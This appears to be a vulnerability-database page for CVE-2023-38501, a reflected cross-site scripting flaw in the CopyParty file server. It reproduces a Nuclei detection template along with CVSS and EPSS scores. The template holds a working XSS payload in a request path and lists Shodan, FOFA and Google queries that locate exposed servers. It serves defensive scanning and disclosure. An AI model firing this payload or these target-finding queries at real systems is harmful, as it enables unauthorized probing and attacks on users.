Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-38501
HistoryOct 05, 2023 - 3:08 p.m.

CopyParty v1.8.6 - Cross Site Scripting

2023-10-0515:08:15
ProjectDiscovery
github.com
3
copyparty
cross site scripting
cvss-3.1
vulnerability
exploit-db
github
nvd
packetstormsecurity

6.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

5.8 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

59.5%

Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
id: CVE-2023-38501

info:
  name: CopyParty v1.8.6 - Cross Site Scripting
  author: ctflearner,r3Y3r53
  severity: medium
  description: |
    Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
  remediation: Fixed in v1.8.6
  reference:
    - https://www.exploit-db.com/exploits/51635
    - https://github.com/9001/copyparty/releases/tag/v1.8.6
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38501
    - http://packetstormsecurity.com/files/173821/Copyparty-1.8.6-Cross-Site-Scripting.html
    - https://github.com/9001/copyparty/commit/007d948cb982daa05bc6619cd20ee55b7e834c38
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-38501
    cwe-id: CWE-79
    epss-score: 0.00198
    epss-percentile: 0.57252
    cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: copyparty_project
    product: copyparty
    shodan-query:
      - title:"copyparty"
      - http.title:"copyparty"
    fofa-query: title="copyparty"
    google-query: intitle:"copyparty"
  tags: cve,cve2023,packetstorm,copyparty,xss,oss,copyparty_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<img src=copyparty onerror=alert(document.domain)>","\">go to")'
        condition: and
# digest: 4a0a00473045022015232a0b9a376e134d12be8765ea8490b2e4e80d4eeb2ce4eac537bbeecb9d87022100a4641d129669bde580ec4d925aaa2a60e36c23467fc951db62fe9a654113f8ac:922c64590222798bb761d5b6d8e72950

6.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

5.8 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

59.5%